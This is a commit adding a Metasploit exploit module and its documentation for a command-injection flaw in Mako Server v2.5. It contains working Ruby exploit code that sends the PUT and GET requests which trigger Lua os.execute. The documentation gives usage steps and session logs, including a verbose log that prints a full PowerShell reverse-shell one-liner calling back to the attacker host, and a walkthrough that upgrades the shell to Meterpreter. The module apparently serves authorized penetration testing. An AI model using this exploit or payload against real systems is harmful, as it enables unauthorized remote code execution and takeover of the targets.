Land rapid7#9133, Command injection in Mako Server examples

acammack-r7 · acammack-r7 · commit 39916ef61a43 · 2017-11-08T15:11:01.000-06:00
diff --git a/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md b/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md
@@ -0,0 +1,163 @@
+## Description
+
+  This module exploits a vulnerability found in Mako Server v2.5.
+  It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.
+
+  Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391
+
+## Vulnerable Application
+
+  [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.
+
+  This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64):
+  - v2.5
+
+  Links:
+  - [Windows installer](https://makoserver.net/download/mako.windows.x86.exe)
+  - [Windows download page](https://makoserver.net/download/windows)
+  - [Documentation](https://makoserver.net/documentation/manual/)
+
+## References for vulnerability
+  - https://blogs.securiteam.com/index.php/archives/3391
+  - https://www.exploit-db.com/exploits/42683
+
+## Verification Steps
+
+  1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
+  2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
+  3. Start msfconsole on host
+  4. Do: ```use exploit/windows/http/makoserver_cmd_exec```
+  5. Do: ```set RHOST <IP address of target system>```
+  6. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
+  7. Do: ```set LHOST <IP address of host system>```
+  8. Do: ```exploit```
+  9. You should get a Windows command shell
+
+## Example Output
+```
+msf > use exploit/windows/http/makoserver_cmd_exec 
+msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
+RHOST => 10.10.10.3
+msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
+PAYLOAD => cmd/windows/reverse_powershell
+msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
+LHOST => 10.10.10.2
+msf exploit(makoserver_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 10.10.10.2:4444 
+[*] Sending payload to target...
+[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400
+
+Microsoft Windows
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\Smith\Downloads\MakoServer>
+
+```
+
+## Example Verbose Output
+```
+msf > use exploit/windows/http/makoserver_cmd_exec 
+msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
+RHOST => 10.10.10.3
+msf exploit(makoserver_cmd_exec) > set VERBOSE true
+VERBOSE => true
+msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
+PAYLOAD => cmd/windows/reverse_powershell
+msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
+LHOST => 10.10.10.2
+msf exploit(makoserver_cmd_exec) > check
+
+[*] Trying to detect running Mako Server and necessary files...
+[*] Mako Server save.lsp returns correct ouput.
+[*] 10.10.10.3:80 The target appears to be vulnerable.
+msf exploit(makoserver_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 10.10.10.2:4444 
+[*] Sending payload to target...
+[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]])
+[*] Sending PUT request to save.lsp...
+[*] Sending GET request to manage.lsp...
+[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400
+
+Microsoft Windows
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\Smith\Downloads\MakoServer>
+
+```
+
+## Scenarios
+
+### Targeting Windows 7 SP1 x64 running Mako Server v2.5
+
+  A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
+
+  ```
+  msf > use exploit/windows/http/makoserver_cmd_exec 
+  msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
+  RHOST => 10.10.10.2
+  msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
+  PAYLOAD => cmd/windows/reverse_powershell
+  msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
+  LHOST => 10.10.10.4
+  msf exploit(makoserver_cmd_exec) > check
+  [*] 10.10.10.2:80 The target appears to be vulnerable.
+  msf exploit(makoserver_cmd_exec) > exploit
+
+  [*] Started reverse TCP handler on 10.10.10.4:4444 
+  [*] Sending payload to target...
+  [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400
+
+  Microsoft Windows
+  Copyright (c) Microsoft Corporation.  All rights reserved.
+
+  C:\Users\Smith\Downloads\MakoServer>^Z
+  Background session 1? [y/N]  y
+  msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
+  msf post(shell_to_meterpreter) > sessions -l
+
+  Active sessions
+  ===============
+
+    Id  Name  Type               Information  Connection
+    --  ----  ----               -----------  ----------
+    1         shell cmd/windows               10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
+  msf post(shell_to_meterpreter) > set SESSION 1
+  SESSION => 1
+  msf post(shell_to_meterpreter) > set LPORT 8080
+  LPORT => 8080
+  msf post(shell_to_meterpreter) > exploit
+
+  [*] Upgrading session ID: 1
+  [*] Starting exploit/multi/handler
+  [*] Started reverse TCP handler on 10.10.10.4:8080
+  [-] Powershell is not installed on the target.
+  [*] Command stager progress: 1.66% (1699/102108 bytes)
+  ...
+  [*] Command stager progress: 100.00% (102108/102108 bytes)
+  [*] Post module execution completed
+  msf post(shell_to_meterpreter) > sessions -l
+
+  Active sessions
+  ===============
+
+    Id  Name  Type                     Information                            Connection
+    --  ----  ----                     -----------                            ----------
+    1         shell cmd/windows                                               10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
+    2         meterpreter x86/windows  smith-PC\smith @ SMITH-PC  10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2)
+
+  msf post(shell_to_meterpreter) > sessions -i 2
+  [*] Starting interaction with 2...
+
+  meterpreter > getuid
+  Server username: smith-PC\smith
+  meterpreter > sysinfo
+  Computer        : SMITH-PC
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  ```
diff --git a/modules/exploits/windows/http/makoserver_cmd_exec.rb b/modules/exploits/windows/http/makoserver_cmd_exec.rb
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Mako Server v2.5 OS Command Injection RCE',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Mako Server v2.5.
+        It's possible to inject arbitrary OS commands in the Mako Server
+        tutorial page through a PUT request to save.lsp.
+
+        Attacker input will be saved on the victims machine and can
+        be executed by sending a GET request to manage.lsp.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC
+          'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['EDB', '42683'],
+          ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
+        ],
+      'Arch'           => ARCH_CMD,
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Mako Server v2.5 - Windows x86/x64', { }]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Sep 3 2017'))
+
+    register_options(
+      [
+        OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
+      ]
+    )
+  end
+
+  def check
+    vprint_status('Trying to detect running Mako Server and necessary files...')
+
+    # Send GET request to determine existence of save.lsp page
+    res = send_request_cgi({
+             'method' => 'GET',
+             'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp')
+           }, 20)
+
+    # If response does not include "MakoServer.net", target is not viable.
+    if res.headers['Server'] !~ /MakoServer.net/
+      vprint_warning('Target is not a Mako Server.')
+      return CheckCode::Safe
+    end
+
+    if res.body
+      if res.body =~ /Incorrect usage/
+        # We are able to determine that the server has a save.lsp page and
+        # returns the correct output.
+        vprint_status('Mako Server save.lsp returns correct ouput.')
+        return CheckCode::Appears
+      else
+        # The page exists, but is not returning the expected output.
+        # May be a different version?
+        vprint_warning('Mako Server save.lsp did not return expected output.')
+        return CheckCode::Detected
+      end
+    else
+      # The above checks failed and exploitability could not be determined.
+      vprint_error('Unable to determine exploitability, save.lsp not found.')
+      return CheckCode::Unknown
+    end
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    print_status('Sending payload to target...')
+
+    # The double square brackets helps to ensure single/double quotes
+    # in cmd payload do not interfere with syntax of os.execute Lua function.
+    cmd = %{os.execute([[#{payload.encoded}]])}
+
+    # If users want to troubleshoot their cmd payloads, they can see the
+    # Lua function with params that the module uses in a more verbose mode.
+    vprint_status("Now executing the following command: #{cmd}")
+
+    # Send a PUT request to save.lsp with command payload
+    begin
+      vprint_status('Sending PUT request to save.lsp...')
+      send_request_cgi({
+         'method' => 'PUT',
+         'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
+         'ctype'  => 'text/plain',
+         'data'   => cmd,
+         'http'   => {
+           'X-Requested-With' => 'XMLHttpRequest',
+           'Referer' => 'http://localhost/Lua-Types.lsp'
+         }
+       }, 20)
+    rescue StandardError => e
+      fail_with(Failure::NoAccess, "Error: #{e}")
+    end
+
+    # Send a GET request to manage.lsp with execute set to true
+    begin
+      vprint_status('Sending GET request to manage.lsp...')
+      send_request_cgi({
+         'method' => 'GET',
+         'uri'    => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
+       }, 20)
+    rescue StandardError => e
+      fail_with(Failure::NoAccess, "Error: #{e}")
+    end
+  end
+end
